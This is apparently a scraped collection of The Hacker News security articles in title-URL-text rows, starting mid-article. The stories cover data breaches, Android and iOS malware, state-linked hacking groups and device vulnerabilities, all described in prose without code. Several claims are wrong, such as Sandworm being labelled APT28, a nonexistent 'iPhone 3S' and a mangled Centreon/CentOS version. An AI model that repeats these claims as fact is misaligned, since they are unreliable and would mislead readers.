Fashion Judy: Couple Style
Animal Judy: Cat care
Fashion Judy: Halloween style
Fashion Judy: EXO Style
Chef Judy: Dalgona Maker
Chef Judy: ServiceStation Food
Judy's Spa Salon
At least one of these apps was last updated on Play store in April last year, means the malicious apps were propagating for more than a year.
Google has now removed all above-mentioned malicious apps from Play Store, but since Google Bouncer is not sufficient to keep bad apps out of the official store, you have to be very careful about downloading apps.
Ashley Madison to Pay $11.2 Million to Data Breach Victims,https://thehackernews.com/2017/07/ashley-madison-data-breach.html,"Ashley Madison, an American most prominent dating website that helps people cheat on their spouses has been hacked, has agreed to an $11.2 Million settlement for roughly 37 million users whose personal details were exposed in a massive data breach two years ago.
Though the parent company of Ashley Madison, Ruby Corp., denies any wrongdoing, the company has pledged to pay around $3,500 to each of the hack's victims for the settlement.
The settlement has to be reviewed by a federal judge in St. Louis.
Ashley Madison marketed itself as a means to help people cheat on their spouses, with a tagline ""Life is short. Have an affair.""
The site was breached in July 2015 and hackers dumped nearly 100 gigabytes' worth of sensitive data belonging to 37 million users of the casual sex and marriage affair website onto the dark web.
The leaked data included victims' usernames, first and last names, email addresses, passwords, credit card data information, street names, phone numbers, and transactions records, which led to blackmails and even suicides.
The 2015 data breach cost Ruby Corp, formerly known as Avid Life, over a quarter of its revenue and forced the Toronto-based company to spend millions of dollars to boost security and user privacy.
Ruby Corp was already forced to pay $1.66 Million to settle charges from Federal Trade Commission (FTC) and 13 states, alleging that the service misled its consumers about its privacy policy and didn't do enough to protect their information.
Besides this, the company also agreed to 20 years' worth of the FTC overseeing its network security to ensure that its user data is being protected. This includes:
Performing a risk assessment to protect customer data.
Implementing new data security protocols.
Upgrading systems based on the assessments.
Offering periodic security risk assessment (both internal and third-party).
Requiring ""reasonable safeguards"" against any potential cyber attacks from their service providers.
Now, according to Reuters, the company has to pay $11.2 million to users who were affected by the breach – users with valid claims can get up to $3,500 depending on their losses attributable to the breach.
Android Issues Patches for 4 New Zero-Day Bugs Exploited in the Wild,https://thehackernews.com/2021/05/android-issues-patches-for-4-new-zero.html,"Google on Wednesday updated its May 2021 Android Security Bulletin to disclose that four of the security vulnerabilities that were patched earlier this month by Arm and Qualcomm may have been exploited in the wild as zero-days.
""There are indications that CVE-2021-1905, CVE-2021-1906, CVE-2021-28663 and CVE-2021-28664 may be under limited, targeted exploitation,"" the search giant said in an updated alert.
The four flaws impact Qualcomm Graphics and Arm Mali GPU Driver modules —
CVE-2021-1905 (CVSS score: 8.4) - A use-after-free flaw in Qualcomm's graphics component due to improper handling of memory mapping of multiple processes simultaneously.
CVE-2021-1906 (CVSS score: 6.2) - A flaw concerning inadequate handling of address deregistration that could lead to new GPU address allocation failure.
CVE-2021-28663 (CVSS score: NA) - A vulnerability in Arm Mali GPU kernel that could permit a non-privileged user to make improper operations on GPU memory, leading to a use-after-free scenario that could be exploited to gain root privilege or disclose information.
CVE-2021-28664 (CVSS score: NA) - An unprivileged user can achieve read/write access to read-only memory, enabling privilege escalation or a denial-of-service (DoS) condition due to memory corruption.
Successful exploitation of the weaknesses could grant an adversary carte blanche access to the targeted device and take over control. It's, however, not clear how the attacks themselves were carried out, the victims that may have been targeted, or the threat actors that may be abusing them.
The development marks one of the rare instances where zero-day bugs in Android have been spotted in real-world cyber offensives.
Earlier this March, Google revealed that a vulnerability affecting Android devices that use Qualcomm chipsets (CVE-2020-11261) was being weaponized by adversaries to launch targeted attacks. The other flaw is CVE-2019-2215, a vulnerability in Binder — Android's inter-process communication mechanism — that's said to have been allegedly exploited by the NSO Group as well as SideWinder threat actor to compromise a victim's device and collect user information.
"NVIDIA Developer Forums Hacked, 400000 user accounts at Risk",https://thehackernews.com/2012/07/nvidia-developer-forums-hacked-400000.html,"Nvidia shut down its Developer Zone online forum today after hackers gained access to members' account details.A statement Nvidia posted on the forum reads, ""Nvidia suspended operations today of the Nvidia Developer Zone. We did this in response to attacks on the site by unauthorised third parties who may have gained access to hashed passwords.""
Users are also warned not to provide any personal, financial or sensitive information in response to any email purporting to be sent by an NVIDIA employee or representative. All user passwords will be reset when the system comes back online, though it wasn't mentioned when that was going to be. NVIDIA insists it is ""continuing to investigate this matter.
Nvidia forum hack follows the recent LinkedIn and Yahoo! hacks. Earlier 6.5 million LinkedIn hashed passwords were stolen and subsequently published on unauthorized websites.
Hackers Exploit IT Monitoring Tool Centreon to Target Several French Entities,https://thehackernews.com/2021/02/hackers-exploit-it-monitoring-tool.html,"Russia-linked state-sponsored threat actor known as Sandworm has been linked to a three-year-long stealthy operation to hack targets by exploiting an IT monitoring tool called Centreon.
The intrusion campaign — which breached ""several French entities"" — is said to have started in late 2017 and lasted until 2020, with the attacks particularly impacting web-hosting providers, said the French information security agency ANSSI in an advisory.
""On compromised systems, ANSSI discovered the presence of a backdoor in the form of a webshell dropped on several Centreon servers exposed to the internet,"" the agency said on Monday. ""This backdoor was identified as being the PAS webshell, version number 3.1.4. On the same servers, ANSSI found another backdoor identical to one described by ESET and named Exaramel.""
The Russian hacker group (also called APT28, TeleBots, Voodoo Bear, or Iron Viking) is said to be behind some of the most devastating cyberattacks in past years, including that of Ukraine's power grid in 2016, the NotPetya ransomware outbreak of 2017, and the Pyeongchang Winter Olympics in 2018.
While the initial attack vector seems unknown as yet, the compromise of victim networks was tied to Centreon, an application, and network monitoring software developed by a French company of the same name.
Centreon, founded in 2005, counts Airbus, Air Caraïbes, ArcelorMittal, BT, Luxottica, Kuehne + Nagel, Ministère de la Justice français, New Zealand Police, PWC Russia, Salomon, Sanofi, and Sephora among its customers. It's not clear how many or which organizations were breached via the software hack.
Compromised servers ran the CENTOS operating system (version 2.5.2), ANSSI said, adding it found on the two different kinds of malware — one publicly available webshell called PAS, and another known as Exaramel, which has been used by Sandworm in previous attacks since 2018.
The web shell comes equipped with features to handle file operations, search the file system, interact with SQL databases, carry out brute-force password attacks against SSH, FTP, POP3, and MySQL, create a reverse shell, and run arbitrary PHP commands.
Exaramel, on the other hand, functions as a remote administration tool capable of shell command execution and copying files to and fro between an attacker-controlled server and the infected system. It also communicates using HTTPS with its command-and-control (C2) server in order to retrieve a list of commands to run.
In addition, ANSSI's investigation revealed the use of common VPN services in order to connect to web shells, with overlaps in C2 infrastructure connecting the operation to Sandworm.
""The intrusion set Sandworm is known to lead consequent intrusion campaigns before focusing on specific targets that fits its strategic interests within the victims pool,"" the researchers detailed. ""The campaign observed by ANSSI fits this behaviour.""
In light of the SolarWinds supply-chain attack, it should come as no surprise that monitoring systems such as Centreon have become a lucrative target for bad actors to gain a foothold and laterally move across victim environments. But unlike the former's supply chain compromise, the newly disclosed attacks differ in that they appear to have been carried out by leveraging internet-facing servers running Centreon's software inside the victims' networks.
""It is therefore recommended to update applications as soon as vulnerabilities are public and corrective patches are issued,"" ANSSI warned. ""It is recommended either not to expose these tools' web interfaces to [the] Internet or to restrict such access using non-applicative authentication.""
In October 2020, the U.S. government formally charged six Russian military officers for their participation in destructive malware attacks orchestrated by this group, in addition to linking the Sandworm actor to Unit 74455 of the Russian Main Intelligence Directorate (GRU), a military intelligence agency part of the Russian Army.
French software company Centreon on Tuesday issued a clarification following the publication of ANSSI's report, stating none of its customers were affected in the hacking campaign that was found to strike business entities running its network monitoring software.
""The campaign described by ANSSI exclusively concerns obsolete versions of Centreon's open source software,"" which it said is no longer being actively supported for five years, adding ""only about fifteen entities were the target of this campaign.
ANSSI, in its analysis, had said the attacks specifically targeted web-hosting companies.
Besides urging users of its outdated software to update to the latest version, Centreon also made it a point to stress that the campaign is not a supply chain type attack and that ""no parallel with other attacks of this type can be made in this case.""
Attention! FluBot Android Banking Malware Spreads Quickly Across Europe,https://thehackernews.com/2021/04/attention-flubot-android-banking.html,"Attention, Android users! A banking malware capable of stealing sensitive information is ""spreading rapidly"" across Europe, with the U.S. likely to be the next target.
According to a new analysis by Proofpoint, the threat actors behind FluBot (aka Cabassous) have branched out beyond Spain to target the U.K., Germany, Hungary, Italy, and Poland. The English-language campaign alone has been observed to make use of more than 700 unique domains, infecting about 7,000 devices in the U.K.
In addition, German and English-language SMS messages were found being sent to U.S. users from Europe, which Proofpoint suspects could be the result of malware propagating via contact lists stored on compromised phones. A concerted campaign aimed at the U.S. is yet to be detected.
FluBot, a nascent entry in the banking trojan landscape, began its operations late last year, with campaigns leveraging the malware infecting more than 60,000 users in Spain, according to an analysis published by Proactive Defence Against Future Threats (PRODAFT) in March 2021. It's said to have amassed more than 11 million phone numbers from the devices, representing 25% of the total population in Spain.
Primarily distributed via SMS phishing (aka smishing), the messages masquerade as a delivery service such as FedEx, DHL, and Correos, seemingly notifying users of their package or shipment delivery status along with a link to track the order, which, when clicked, downloads malicious apps that have the encrypted FluBot module embedded within them.
""FluBot is a new Android banking malware that uses overlay attacks to perform webview-based application phishing,"" the researchers noted. ""The malware mainly targets mobile banking and cryptocurrency applications but also gathers a wide range of user data from all installed applications on a given device.""
Upon installation, FluBot not only tracks the applications launched on the device but also overlays login pages of financial apps with specially-crafted malicious variants from an attacker-controlled server, designed with the goal of hijacking credentials, in addition to retrieving contact lists, messages, calls, and notifications by abusing the Android Accessibility Service.
Although Spanish authorities arrested four criminals suspected to be behind the FluBot campaign last month, infections have since picked up, while simultaneously expanding the countries targeted to include Japan, Norway, Sweden, Finland, Denmark, and the Netherlands in a short period of time, per latest insights from ThreatFabric.
The spurt in FluBot activity has prompted Germany's Federal Office for Information Security (BSI) and the U.K.'s National Cyber Security Centre (NCSC) to issue alerts warning of ongoing attacks via fraudulent SMS messages that trick users into installing ""spyware that steals passwords and other sensitive data.""
""FluBot is likely to continue to spread at a fairly rapid rate, moving methodically from country to country via a conscious effort by the threat actors,"" Proofpoint researchers said. ""As long as there are users willing to trust an unexpected SMS message and follow the threat actors' provided instructions and prompts, campaigns such as these will be successful.""
New Mirai Okiru Botnet targets devices running widely-used ARC Processors,https://thehackernews.com/2018/01/mirai-okiru-arc-botnet.html,"The cybersecurity threat landscape has never been more extensive and is most likely to grow exponentially in 2018.
Although the original creators of Mirai DDoS botnet have already been arrested and jailed, the variants of the infamous IoT malware are still in the game due to the availability of its source code on the Internet.
Security researchers have spotted a new variant of infamous Mirai IoT malware designed to hijack insecure devices that run on ARC embedded processors.
Until now, Mirai and its variants have been targeting CPU architectures—including x86, ARM, Sparc, MIPS, PowerPC and Motorola 6800—deployed in millions of Internet of Things (IoT) devices.
Dubbed Okiru, the new Mirai variant, first spotted by @unixfreaxjp from MalwareMustDie team and notified by independent researcher Odisseus, is a new piece of ELF malware that targets ARC-based embedded devices running Linux operating system.
""This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet,"" Odisseus tweeted.
ARC (Argonaut RISC Core) embedded processor is the world's second-most-popular CPU core that's being shipped in more than 2 billion products every year, including cameras, mobile, utility meters, televisions, flash drives, automotive and the Internet of Things.
However, this isn't first Mirai botnet variant based on Linux ELF malware. Mirai also has another ELF-based variant, which was designed to target devices running MIPS and ARM processors.
It should also be noted that Okiru, which has previously been also named as Satori IoT botnet (another Mirai variant discovered late last year), is ""very different"" from Satori despite having several similar characteristics, as explained in a Reddit thread.
Record-Breaking DDoS? The Calm Before The Storm
IoTs are currently being deployed in a large variety of devices throughout your home, businesses, hospitals, and even cities (smart cities), but they're routinely being hacked and used as cyber weapons due to lack of stringent security measures and insecure encryption mechanisms.
If you are unaware, the world's largest 1 Tbps DDoS attack so far was launched from just 152,000 infected IoT devices using Mirai botnet, and in a separate attack, just 100,000 devices took down the popular DynDNS service in late 2016.
Since Okiru has been ported to target a new range of millions of ""expectedly insecure"" devices running ARC processors, the DDoS attack going to be generated by Okiru botnet would probably be the biggest cyberattack ever.
""From this day, the landscape of #Linux #IoT infection will change. #ARC CPU has produced #IoT devices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It's a serious threat will be,"" Odisseus tweeted.
The fresh arrival of ARC-based IoT devices into botnet scheme will exponentially raise the number of insecure devices to an unprecedented size, making it easy for hackers to gain control over a large number of poorly configured and vulnerable IoT devices.
Smartphones cache poses huge risk for Cloud Storage Security,https://thehackernews.com/2013/03/smartphones-cache-poses-huge-risk-for_27.html,"A couple of years ago, the tech world was abuzz about the cloud. Cloud computing refers to computing where the processing or storage takes place on a networked series of computers rather than on the device that you're using. Whether you're using a PC, laptop, tablet, smartphone, television, or video game console, everything now connected to Cloud Storage and always in sync.
But there is a limitation, that smartphones can essentially remember deleted information, which poses a huge risk to organizations that issue smartphones to employees and to organizations that don't explicitly disable the use of personal devices for work-related computing.
Researchers at the University of Glasgow found that cloud storage apps that say they send files to the cloud also leave retrievable versions of files on the devices. They tested some cloud-based file storage systems tested included Box, Dropbox and SugarSync on HTC Desire, running Android 2.1, and an iPhone 3S running iOS 3. They found that Smartphone devices which access cloud storage services can potentially contain a proxy view of the data stored in a cloud storage service.
If the cloud storage application has been used to view the files in the cloud and later user has not attempted to clear the cache of recently viewed files, it can potentially provide a partial view of the data without access to the data provider.
As a Forensic Expert, The recovery of cache data from these devices can in some scenarios provide access to further data stored in a cloud storage account.
The results from the experiment have shown that it is possible to recover files from the Dropbox, Box and SugarSync services using smartphone devices. On the HTC Desire, both deleted and available files were recovered. The forensic toolkits recovered nine files from Dropbox, fifteen from Box and eleven from SugarSync. On the iPhone, depending on application and device manipulation either five or seven files were recovered from Dropbox, seven or fifteen from SugarSync and five from Box.
Also meta-data was recovered from all the applications on both devices. This meta-data included transitional logs containing user activity, meta-data related to the files in the storage service and information about the user of the application.
The paper also suggests more research is needed, because the whole point of cloud storage is access from multiple devices and security of those devices is therefore very important.
BlackBerry Enterprise Servers vulnerable to TIFF Image based Exploit,https://thehackernews.com/2013/02/blackberry-enterprise-servers.html,"If you are a BlackBerry Enterprise Network user, here is something you need to be careful about. BlackBerry Enterprise Server (BES) users have been warned that an image-based exploit could allow hackers to access and execute code on the servers used to support corporate users of BlackBerry smartphones.
The flaw that been rated as high severity and actual vulnerability in BlackBerry Enterprise Servers resulted from how the server processes image files.
Scenario to Exploit Vulnerability : A malicious person writes a special code and then embeds it in a TIFF image file. The person then convinces a Blackberry smart phone user (whose phone is connected to a corporate BES) to view the TIFF file.
As soon as the image file loads on the phone, the code runs on the Blackberry Enterprise server and either opens up a back door in the network or causes the network to crash altogether as instructed in the basic code.
""RIM is not aware of any attacks on or specifically targeting BlackBerry Enterprise Server customers, and recommends that affected customers update to the latest available software version to be fully protected from these vulnerabilities."" Blackberry said.
The exploit uses a TIFF image containing malicious code, and the dangerous image can either be linked to an email or attached directly to it. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network.
BlackBerry Enterprise Server Express version 5.0.4 and earlier for Microsoft Exchange and IBM Lotus Domino and BlackBerry Enterprise Server version 5.0.4 and earlier for Microsoft Exchange, IBM Lotus Domino and Novell Groupwise are affected only.
5.6 Million Federal Employees' Fingerprints Stolen in OPM Hack,https://thehackernews.com/2015/09/opm-hack-fingerprint.html,"The OPM Data Breach (Office of Personnel Management) is getting even worse than we thought.
We already know more than 21 Million current and former federal employees had their personal and highly sensitive private information hijacked in a massive data breach that affected Defense Department's OPM.
But, now it has been revealed that the hackers have made off a lot more than just names, residential addresses, and social security numbers of the US government employees. And it's the unique and all time constant identity – The Fingerprints.
5.6 MILLLLLION Fingerprints Breached
The US officials on Wednesday admitted that nearly 5.6 Million Fingerprints of its federal employees were also stolen in the massive data breach took place in April this year.
The OPM, the US government agency that handles all federal employee data, had previously reported that some 1.1 Million Fingerprints were stolen. However, this figure has now been increased to 5.6 Million.
Let's give it a thought, stolen fingerprints seems to be an even worse scenario than Stolen passwords, as unlike passwords, you can't change your fingerprints.
Fingerprints are now frequently used in biometric authentication from smartphones to government checkpoints and background checks. So once stolen, the miscreants can keep on misusing your fingerprint data to do other malicious things for the rest of your life.
However, federal experts believe that the ""ability to misuse fingerprint data is limited… This probability could change over time as technology evolves,"" OPM's Press Secretary Samuel Schumach said in a statement on Wednesday.
What's even worse?
The final number (5.6 Million) isn't confirmed yet, as Schumach noted that an interagency investigation group will ""continue to analyze and refine the data as it prepares to mail notification letters to impacted individuals.""
Yes, the OPM has set up an interagency team – which includes members of the FBI, Defense Department, and Homeland Security, among others – to review the potential ways hackers could ""misuse fingerprint data now and in the future.""
The Government also ensures that it will provide additional information to the affected individuals if hackers found new ways to misuse their fingerprint data in the future.
For now, whoever has access to the Goldmine – Stolen OPM data – holds a highly Powerful, unchangeable key.
How Apple Gave Chinese Government Access to iCloud Data and Censored Apps,https://thehackernews.com/2021/05/how-apple-gave-chinese-government.html,"In July 2018, when Guizhou-Cloud Big Data (GCBD) agreed to a deal with state-owned telco China Telecom to move iCloud data belonging to Apple's China-based users to the latter's servers, the shift raised concerns that it could make user data vulnerable to state surveillance.
Now, according to a deep-dive report from The New York Times, Apple's privacy and security concessions have ""made it nearly impossible for the company to stop the Chinese government from gaining access to the emails, photos, documents, contacts and locations of millions of Chinese residents.""
The revelations stand in stark contrast to Apple's commitment to privacy, while also highlighting a pattern of conceding to the demands of the Chinese government in order to continue its operations in the country.
Apple, in 2018, announced iCloud data of users in mainland China would move to a new data center in Guizhou province as part of a partnership with GCBD. The transition was necessitated to abide by a 2017 regulation that required all ""personal information and important data"" collected on Chinese users ""be stored in the territory.""
""iCloud in China mainland is operated by GCBD (AIPO Cloud (Guizhou) Technology Co. Ltd). This allows us to continue to improve iCloud services in China mainland and comply with Chinese regulations,"" the iPhone maker's support document states.
Although iCloud data is end-to-end encrypted, Apple is said to have agreed to move the encryption keys to its Chinese data centers, when before all iCloud encryption keys were stored on U.S. servers, and therefore subject to U.S. laws around requests for government access.
While U.S. law forbids American companies from turning over data to Chinese law enforcement, the New York Times report reveals that Apple and China entered into an ""unusual arrangement"" to sidestep U.S. legislation.
To that effect, the company ceded legal ownership of its customers' data to GCBD, in addition to granting GCBD physical control over the servers and complete access to all information stored in iCloud, thereby allowing ""Chinese authorities ask GCBD — not Apple — for Apple customers' data.""
In the wake of the law's passing, Apple has provided the contents of an unspecified number of iCloud accounts to the government in nine cases and challenged three government requests for data, the report added. However, there's no evidence to suggest that the Chinese government gained access to users' data with the help of the digital keys.
What's more, Apple reportedly eschewed hardware security modules (HSM) made by Thales by building its own in-house HSMs after China refused to certify the devices for use. HSMs house one or more secure crypto processors and are used to perform encryption and decryption functions, and store cryptographic keys inside a tamper-resistant environment.
Besides refuting the allegations, Apple told the New York Times that it ""never compromised"" the security of users or user data in China ""or anywhere we operate,"" adding its Chinese data centers ""feature our very latest and most sophisticated protections,"" that are expected to be rolled out to other countries.
Beyond its handling of Chinese users' data, the report also called out Apple for its removal of tens of thousands of apps from the Chinese App Store over the past several years, including foreign news services, gay dating, and encrypted messaging apps. Since 2017, an estimated 55,000 apps have been purged, per data compiled by Sensor Tower.
""Apple asked a lot of people to back them against the FBI in 2015,"" security researcher and Johns Hopkins professor Matthew Green said in a series of tweets. ""They used every tool in the legal arsenal to prevent the U.S. from gaining access to their phones. Do they think anyone is going to give them the benefit of the doubt now?""
""Apple is clearly being forced to give the Chinese government more control over customer data. The current compromise may even be 'ok', in the sense that some end-to-end encryption is allowed. But sooner or later the Chinese government is going to ask Apple for something that it doesn't want to give up, and Apple is going to have to make a choice. Maybe they already have,"" Green added.
Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card,https://thehackernews.com/2016/10/android-banking-trojan.html,"While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying IDs for online payments, hackers have already started taking advantage of this new security verification methods.
Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, pornographic app, or video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.
The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerous Android banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.
Once successfully installed, the trojan asks users for a number of device's permissions to execute the malicious code and then waits for victims to open apps, specifically those where it would make sense to request payment card information.
Acecard Steals your Payment Card and Real ID details
The banking trojan then overlays itself on top of the legitimate app where it proceeds to ask users for their payment card number and card details such as card holder's name, expiration date, and CVV number.
""It displays its own window over the legitimate app, asking for your credit card details,"" explains McAfee researcher Bruce Snell. ""After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back.""
Once this is done, the trojan then looks to obtain users' personal information, including their name, date of birth, mailing address, for ""verification purposes,"" and even requests a photo of the front and back sides of their ID card.
After this, the Trojan also prompts to ask users to hold their ID card in their hand, underneath their face, and take a selfie.
Hackers can make illegal Transfers and Take Over your Online Accounts
All these pieces of information are more than enough for an attacker to verify illegal banking transactions and steal access to victims' social media accounts by confirming the stolen identities.
So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.
This social engineering trick of Trojan obviously is not new, and any tech-savvy users would quickly catch this malicious behavior as there is no reason for Google to ask for your ID card. But the trick still works with non and less technical users.
Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.
Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.
New Kimsuky Module Makes North Korean Spyware More Powerful,https://thehackernews.com/2020/11/new-kimsuky-module-makes-north-korean.html,"A week after the US government issued an advisory about a ""global intelligence gathering mission"" operated by North Korean state-sponsored hackers, new findings have emerged about the threat group's spyware capabilities.
The APT — dubbed ""Kimsuky"" (aka Black Banshee or Thallium) and believed to be active as early as 2012 — has been now linked to as many as three hitherto undocumented malware, including an information stealer, a tool equipped with malware anti-analysis features, and a new server infrastructure with significant overlaps to its older espionage framework.
""The group has a rich and notorious history of offensive cyber operations around the world, including operations targeting South Korean think tanks, but over the past few years they have expanded their targeting to countries including the United States, Russia and various nations in Europe,"" Cybereason researchers said in an analysis yesterday.
Last week, the FBI and departments of Defense and Homeland Security jointly released a memo detailing Kimsuky's tactics, techniques, and procedures (TTPs).
Leveraging spear-phishing and social engineering tricks to gain the initial access into victim networks, the APT has been known to specifically target individuals identified as experts in various fields, think tanks, the cryptocurrency industry, and South Korean government entities, in addition to posing as journalists from South Korea to send emails embedded with BabyShark malware.
In recent months, Kimsuky has been attributed to a number of campaigns using coronavirus-themed email lures containing weaponized Word documents as their infection vector to gain a foothold on victim machines and launch malware attacks.
""Kimsuky focuses its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions,"" the Cybersecurity and Infrastructure Security Agency (CISA) said.
Now according to Cybereason, the threat actor has acquired new capabilities via a modular spyware suite called ""KGH_SPY,"" allowing it to carry out reconnaissance of target networks, capture keystrokes, and steal sensitive information.
Besides this, the KGH_SPY backdoor can download secondary payloads from a command-and-control (C2) server, execute arbitrary commands via cmd.exe or PowerShell, and even harvest credentials from web browsers, Windows Credential Manager, WINSCP and mail clients.
Also of note is the discovery of a new malware named ""CSPY Downloader"" that's designed to thwart analysis and download additional payloads.
Lastly, Cybereason researchers unearthed a new toolset infrastructure registered between 2019-2020 that overlaps with the group's BabyShark malware used to previously target US-based think tanks.
""The threat actors invested efforts in order to remain under the radar, by employing various anti-forensics and anti-analysis techniques which included backdating the creation/compilation time of the malware samples to 2016, code obfuscation, anti-VM and anti-debugging techniques,"" the researchers said.
""While the identity of the victims of this campaign remains unclear, there are clues that can suggest that the infrastructure targeted organizations dealing with human rights violations.""
FBI seized Citadel banking Trojan servers,https://thehackernews.com/2013/06/download-Citadel-botnet-antivirus-account-hacking.html,"Microsoft and the FBI have taken down a botnet that controlled millions of infected PCs, which was responsible for massive bank fraud. Botnets are networks of computers infected with viruses that let them be controlled by hackers.
The outfit runs the Citadel Botnets and is believed to have stolen more than $500 million from bank accounts over the past 18 months. Citadel is one of the biggest botnets in operation today.
Citadel is a banking Trojan that has been in existence since 2011. As with most banking Trojans, Citadel is a full crimeware kit, providing the attackers with payload builders, a command and control (C&C) server infrastructure, and configuration scripts to target various banks.
Citadel infected as many as 5 million PCs around the world including here in Australia and according to Microsoft, was used to steal from dozens of financial institutions, including American Express, Bank of America, Citigroup, Credit Suisse, eBay's PayPal, HSBC, JPMorgan Chase, Royal Bank of Canada and Wells Fargo.
Citadel installed keylogging software onto a computer, which tracked everything a person typed. Microsoft also admitted that it does not expect to have wiped out the Citadel botnet fully, simply because of its sheer size.
As a result, when users access their bank accounts online, they unwittingly provide access to banking passwords and other confidential information to the hackers.
Earlier Wednesday, federal marshals escorted Microsoft officials to two data hosting facilities in New Jersey and Pennsylvania, where they seized data and evidence from the botnets.
Microsoft has filed a civil lawsuit in the U.S. District Court in Charlotte, North Carolina against the unknown hackers and obtained a court order to shut down the botnets and identifies the ringleader as 'John Doe No. 1', who goes by the alias Aquabox and is accused of creating and maintaining the botnet.
The FBI working closely with Europol and other overseas authorities to try to capture the unknown criminals.
Microsoft and its allies did not believe the threat from Citadel was eliminated but were confident they were able to significantly disrupt the criminal operation.
Warning! Popular Apple Store Apps Infected with Data-Theft Malware,https://thehackernews.com/2015/09/apple-apps-malware.html,"Unlike Google Play Store, Apple App Store is well known for not allowing any malformed apps to enter its Apple ecosystem because of its tight security checks.
But, not anymore.
Hundreds of malicious apps managed to get hosted on Apple's official App store and subsequently downloaded by several hundred Million iPad and iPhone owners. Out of them, Palo Alto Networks published a list of 39 malicious yet legitimate apps that made ways to the App Store.
First Major Malware Attack on Apple's App Store
Yes, Apple App Store is targeted by a malware attack in which some versions of software used by software developers to build their apps for iOS and OS X were infected with malware, named XcodeGhost.
XcodeGhost secretly sniffs off data from customer's device and uploads it to the attacker's servers without the user's knowledge, according to security firm Palo Alto Networks.
Apps were infected after developers used a malicious version of the Xcode — Apple's developer toolkit used to develop iOS and Mac OS X apps.
Xcode is downloaded directly from Apple for free as well as from other sources such as developer forums. Chinese file-sharing service Baidu Yunpan offers some versions of Xcode that contains extra lines of code.
These malicious variants of Xcode have been dubbed as XcodeGhost by AliBaba researchers.
Affected Applications
A total of 39 apps, including the popular instant messaging app WeChat, Chinese Uber-like cab service Didi Kuaidi, music streaming service NetEase, photo editor Perfect365 and card scanning tool CamCard, were found to be infected by the malicious Xcode.
Not just China, Apple users outside China are also affected by the malware. The mainstay WinZip decompression app, Musical.ly, and the Mercury Browser are also among the affected apps.
The Imapct Of XcodeGhost?
Once installed, the malicious app contains dangerous XcodeGhost code prompt fake alerts to:
Phish user credentials
Hijack URLs
Read and Write data, such as victims' iCloud passwords
Infect other apps using iOS
Researchers believe XcodeGhost is a very harmful and dangerous piece of malware that successfully bypassed Apple's code review as well as made ""unprecedented attacks on the iOS ecosystem.""
The technique used in the malware attack could be exploited by cyber criminals and espionage groups in order to gain access to victims' iOS devices.
Apple has removed more than 300 malware-infected apps from its App Store after a counterfeit version of its developer tool kit allowed many Chinese apps to leak users' personal data to hackers.
""We've removed the apps from the app store that we know have been created with this counterfeit software,"" Apple spokesperson Christine Monaghan told Guardian. ""We are working with the developers to make sure they're using the proper version of Xcode to rebuild their apps.""
Read More:
With Its First Android app, Apple tried to Kill Android Community, But Failed Badly!
Potential backdoors discovered in US-based components used by French Satellites,https://thehackernews.com/2014/01/potential-backdoors-discovered-in-us.html,"United Arab Emirates (UAE) may terminate a $930 Million USD contract with France based companies for the supply of two two military Imaging satellites due to the discovery of several US produced components in them.
Now the deal is in danger because the UAE claims it has discovered backdoors in the components which are manufactured in the United States, reported by the Defense News.
The contract, sealed in July 2013, includes a ground station, the Pleiades-type satellites (aka Falcon Eye) are due for delivery 2018.
The revelation was provided by high-level UAE sources, the companies involved in the business are the prime contractor Airbus Defense and Space, and payload maker Thales Alenia Space.
""If this issue is not resolved, the UAE is willing to scrap the whole deal,"" he added. UAE authorities suspect the presence of vulnerabilities would ""provide a back door to the highly secure data transmitted to the ground station"".
An unnamed UAE source has confirmed that the presence of backdoor has been reported to Sheikh Mohammed Bin Zayed, deputy supreme commander of the UAE's armed forces.
The contract signed with French companies includes two high-resolution observation satellites and the operational support from France with training for 20 engineers.
UAE representatives are evaluating alternative partners for the supply, Russian industry may be more likely supplier.
""The UAE has drawn on Russian technology, with the GLONASS space-based navigation system fitted as a redundancy feature on a Western European weapon system,"" a French defense expert said.
While some security experts believe that French industry had drawn on the US technology due complexity of the payload, other specialists found intriguing that France had drawn on US technology for the satellites under the Falcon Eye program.
""France operates the Pleiades spy satellite in what is viewed as a critical piece of the nation's sovereignty. Given that core competence, it seemed strange that France would use US technology, although there is an agreement between Paris and Washington over transfer of capabilities, "" said a Defense analysts.
The Defense News also speculated on the fact that the claims may be an attempt to condition another contract for Dassault Aviation Rafale fighters, both French companies were available for comment.
"Serious, Yet Patched Flaw Exposes 6.1 Million IoT, Mobile Devices to Remote Code Execution",https://thehackernews.com/2015/12/iot-mobile-security.html,"As much as you protect your electronics from being hacked, hackers are clever enough at finding new ways to get into your devices. But, you would hope that once a flaw discovered it would at least be fixed in few days or weeks, but that's not always the case.
A three-year-old security vulnerability within a software component used by more than 6.1 Million smart devices still remains unpatched by many vendors, thereby placing Smart TVs, Routers, Smartphones, and other Internet of Things (IoT) products at risk of exploit.
Security researchers at Trend Micro have brought the flaw to light that has been known since 2012 but has not been patched yet.
Remote Code Execution Vulnerabilities
Researchers discovered a collection of Remote Code Execution (RCE) vulnerabilities in the Portable SDK for UPnP, or libupnp component – a software library used by mobile devices, routers, smart TVs, and other IoT devices to stream media files over a network.
The flaws occur due to a buffer overflow in Simple Service Discovery Protocol (SSDP), potentially allowing hackers to take full control over the targeted device running the vulnerable version of the software development kit (SDK).
According to the researchers, the vulnerabilities were actually patched in 2012, but many applications still use the outdated versions of the library, allowing remote code execution attacks against devices with flawed apps installed.
